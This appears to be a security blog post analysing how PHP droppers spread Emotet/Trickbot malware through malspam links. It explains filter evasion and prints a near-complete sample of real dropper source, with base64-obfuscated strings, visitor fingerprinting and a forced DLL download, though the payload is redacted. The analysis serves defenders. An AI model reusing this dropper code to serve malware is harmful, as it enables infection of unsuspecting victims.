How PHP Droppers Spread Malware

PHP Droppers⌗
A dropper is a type of hacktool for disguising and downloading the malware payload which will be “dropped” to the victim device.
PHP droppers are used for evading detection by host anti-virus/malware and bypassing email security controls like filters and/or scanning. They are used for malicious URLs inside malspam sent to victims and prompt a binary data file download when the the link is clicked.

Malspam Distribution⌗
In 2019 Proofpoint released a threat report showing usage of malware spread through malicious URLs exceeded the traditional file attachment method:

Why are droppers used?⌗
PHP droppers are used because they allow the attacker’s malspam to bypass certain email filters using two main techniques:
1) No Email Attachments Needed⌗
- Malware is not stored as an email file attachment
An attachment makes the email score much higher on email filters and the attached data gets flagged by a scanner like VirusTotal then it has a low chance of reaching a victim’s inbox.
2) “Clean” URLs⌗
Malicious URL does not contain a file extension (e.g pretty permalinks)
A direct link to the malware looks much more suspicious and is easily scanned by online scanners like VirusTotal:

How A PHP Dropper Works⌗
Identify Victims⌗
- The dropper collects browser fingerprint data on the visitor to determine how the malware should proceed with trying to download onto the visitor’s device.
private function getPlatform()
$userAgent = ( isset($_SERVER[$this->d600fda8b0f54c("MGFaZFF3PT06OkhUVFBfVVNFUl9BR0VOVA==")]) ? $_SERVER[$this->d600fda8b0f54c("MGFaZFF3PT06OkhUVFBfVVNFUl9BR0VOVA==")] : '' );
$platform = 0; // PLATFORM_UNKNOWN
if (stripos($userAgent, $this->d600fda8b0f54c("T0grSmxINWEwQVdDTEt3PTo6d2luZG93cw==")) !== false) {
$platform = 4; // PLATFORM_WINDOWS
} else if (stripos($userAgent, $this->d600fda8b0f54c("a3lYSUlBTWg6OmlQYWQ=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} else if (stripos($userAgent, $this->d600fda8b0f54c("QUF6UVQvem1OS3o5djVpbG1BPT06OmlQb2Q=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} else if (stripos($userAgent, $this->d600fda8b0f54c("TzVTRDA4ajNCbkE9OjppUGhvbmU=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} elseif (stripos($userAgent, $this->d600fda8b0f54c("V3dlSUhRUy8zU0NjUUlTaGtpYkZhZz09OjptYWM=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} elseif (stripos($userAgent, $this->d600fda8b0f54c("R1VGMGljcDI6OmFuZHJvaWQ=")) !== false) {
$platform = 1; // PLATFORM_ANDROID
} elseif (stripos($userAgent, $this->d600fda8b0f54c("NXFqQWpKdDA5RCtITEsyWkRsWT06OmxpbnV4")) !== false) {
$platform = 3; // PLATFORM_LINUX
} elseif (stripos($userAgent, $this->d600fda8b0f54c("bHZ5eVd5OTU6Ondpbg==")) !== false) {
$platform = 4; // PLATFORM_WINDOWS
} elseif (stripos($userAgent, $this->d600fda8b0f54c("NDU4K1FtdFM6OmlPUw==")) !== false) {
$platform = 2; // PLATFORM_APPLE
return $platform;
public function d600fda8b0f54c($s)
$string = base64_decode($s);
return explode('::', $string, 2)[1];
Hides the Binary Malware⌗
- The binary malware can be stored as text strings in the PHP dropper’s code, or it can be dynamically provided by the attacker to the PHP dropper via POST requests.
// Send content
$contentData = '[put binary data payload here in proper format]';
return gzinflate(base64_decode($contentData));
Generates Download Prompt⌗
- By using PHP’s header function, the dropper is able to trick the victim’s browser to prompt the download of a binary file (e.g bQ4O5I.dll) to the victim.
// Resist Varnish-cache
setcookie(uniqid(), time(), time() + 60, '/');
// Send cache headers
$timestamp = gmdate($this->d600fda8b0f54c("WmkyV2tSbz06OkQsIGQgTSBZIEg6aTpz")) . $this->d600fda8b0f54c("bEkrU0NPMTNDTFhqNXpHdG5KVXU6OiBHTVQ=");
header($this->d600fda8b0f54c("bk94Rll5UT06Okxhc3QtTW9kaWZpZWQ6IA==") . $timestamp);
header($this->d600fda8b0f54c("SjZwQitRQ294cVk9OjpFeHBpcmVzOiA=") . $timestamp);
// Send content headers
$contentName = 'bQ4O5I.dll';
$contentType = 'application/octet-stream';
header($this->d600fda8b0f54c("ZGZVM3JWUjZvUT09OjpDb250ZW50LVR5cGU6IA==") . $contentType);
header($this->d600fda8b0f54c("d01KaklnPT06OkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSI=") . $contentName . '"');
Here is a sample of a live PHP dropper used to spread Emotet/Trickbot related malware (payload redacted) via malspam distribution:
class c600fda8b0b856
private function getPlatform()
$userAgent = ( isset($_SERVER[$this->d600fda8b0f54c("MGFaZFF3PT06OkhUVFBfVVNFUl9BR0VOVA==")]) ? $_SERVER[$this->d600fda8b0f54c("MGFaZFF3PT06OkhUVFBfVVNFUl9BR0VOVA==")] : '' );
$platform = 0; // PLATFORM_UNKNOWN
if (stripos($userAgent, $this->d600fda8b0f54c("T0grSmxINWEwQVdDTEt3PTo6d2luZG93cw==")) !== false) {
$platform = 4; // PLATFORM_WINDOWS
} else if (stripos($userAgent, $this->d600fda8b0f54c("a3lYSUlBTWg6OmlQYWQ=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} else if (stripos($userAgent, $this->d600fda8b0f54c("QUF6UVQvem1OS3o5djVpbG1BPT06OmlQb2Q=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} else if (stripos($userAgent, $this->d600fda8b0f54c("TzVTRDA4ajNCbkE9OjppUGhvbmU=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} elseif (stripos($userAgent, $this->d600fda8b0f54c("V3dlSUhRUy8zU0NjUUlTaGtpYkZhZz09OjptYWM=")) !== false) {
$platform = 2; // PLATFORM_APPLE
} elseif (stripos($userAgent, $this->d600fda8b0f54c("R1VGMGljcDI6OmFuZHJvaWQ=")) !== false) {
$platform = 1; // PLATFORM_ANDROID
} elseif (stripos($userAgent, $this->d600fda8b0f54c("NXFqQWpKdDA5RCtITEsyWkRsWT06OmxpbnV4")) !== false) {
$platform = 3; // PLATFORM_LINUX
} elseif (stripos($userAgent, $this->d600fda8b0f54c("bHZ5eVd5OTU6Ondpbg==")) !== false) {
$platform = 4; // PLATFORM_WINDOWS
} elseif (stripos($userAgent, $this->d600fda8b0f54c("NDU4K1FtdFM6OmlPUw==")) !== false) {
$platform = 2; // PLATFORM_APPLE
return $platform;
public function d600fda8b0f54c($s)
$string = base64_decode($s);
return explode('::', $string, 2)[1];
public function p600fda8b0bb7c()
$qString = $this->d600fda8b0f54c("UmhDWnhoTGtCNTRKakE9PTo6UVVFUllfU1RSSU5H");
if (!empty($_SERVER[$qString])) {
return $_SERVER[$qString];
$path = '.' . sha1(basename(dirname(__FILE__)));
if (($fp = fopen($path, 'c+')) !== false) {
if (flock($fp, LOCK_EX)) {
$stat = array();
$fileSize = filesize($path);
if ($fileSize > 0) {
$stat = json_decode(fread($fp, $fileSize), true);
$platform = $this->getPlatform();
if (!isset($stat[$platform]) || !is_int($stat[$platform])) {
$stat[$platform] = 1;
} else {
fseek($fp, 0);
fwrite($fp, json_encode($stat));
flock($fp, LOCK_UN);
// Resist Varnish-cache
setcookie(uniqid(), time(), time() + 60, '/');
// Send cache headers
$timestamp = gmdate($this->d600fda8b0f54c("WmkyV2tSbz06OkQsIGQgTSBZIEg6aTpz")) . $this->d600fda8b0f54c("bEkrU0NPMTNDTFhqNXpHdG5KVXU6OiBHTVQ=");
header($this->d600fda8b0f54c("bk94Rll5UT06Okxhc3QtTW9kaWZpZWQ6IA==") . $timestamp);
header($this->d600fda8b0f54c("SjZwQitRQ294cVk9OjpFeHBpcmVzOiA=") . $timestamp);
// Send content headers
$contentName = 'bQ4O5I.dll';
$contentType = 'application/octet-stream';
header($this->d600fda8b0f54c("ZGZVM3JWUjZvUT09OjpDb250ZW50LVR5cGU6IA==") . $contentType);
header($this->d600fda8b0f54c("d01KaklnPT06OkNvbnRlbnQtRGlzcG9zaXRpb246IGF0dGFjaG1lbnQ7IGZpbGVuYW1lPSI=") . $contentName . '"');
// Send content
$contentData = '[put binary data payload here in proper format]';
return gzinflate(base64_decode($contentData));
echo (new c600fda8b0b856)->p600fda8b0bb7c();